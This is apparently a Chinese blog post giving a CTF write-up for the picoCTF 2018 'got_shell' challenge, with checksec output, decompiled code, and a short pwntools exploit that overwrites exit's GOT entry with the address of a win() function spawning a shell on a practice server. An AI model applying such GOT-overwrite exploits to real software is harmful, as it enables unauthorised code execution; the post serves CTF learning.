加载头像

picoctf_2018_got_shell

Ubuntu 18 来源:https://github.com/hebtuerror404

0x01

checksec

sh
1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/picoctf_2018_got_shell/PicoCTF_2018_got-shell'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

IDA

main()

c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  _DWORD *v3; // [esp+14h] [ebp-114h] BYREF
  int v4; // [esp+18h] [ebp-110h] BYREF
  char s[256]; // [esp+1Ch] [ebp-10Ch] BYREF
  unsigned int v6; // [esp+11Ch] [ebp-Ch]

  v6 = __readgsdword(0x14u);
  setvbuf(_bss_start, 0, 2, 0);
  puts("I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?");
  __isoc99_scanf("%x", &v3);
  sprintf(s, "Okay, now what value would you like to write to 0x%x", v3);
  puts(s);
  __isoc99_scanf("%x", &v4);
  sprintf(s, "Okay, writing 0x%x to 0x%x", v4, v3);
  puts(s);
  *v3 = v4;
  puts("Okay, exiting now...\n");
  exit(1);
}

win()

c
1
2
3
4
int win()
{
  return system("/bin/sh");
}

0x02

思路

修改exit的got为win

0x03

exp

python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 27769)
path = './PicoCTF_2018_got-shell'
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

win = 0x804854B
payload = b'0x804a014'
io.sendline(payload)
payload = b'0x804854B'
io.sendline(payload)
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
Nickname
Email
Website
0/500
0 comments
Powered by Twikoo v1.6.39
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
2380 天
全站字数 :
85.2k
总访客数 :
9354
总访问量 :
12140
最后更新 :
10-2-2024
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體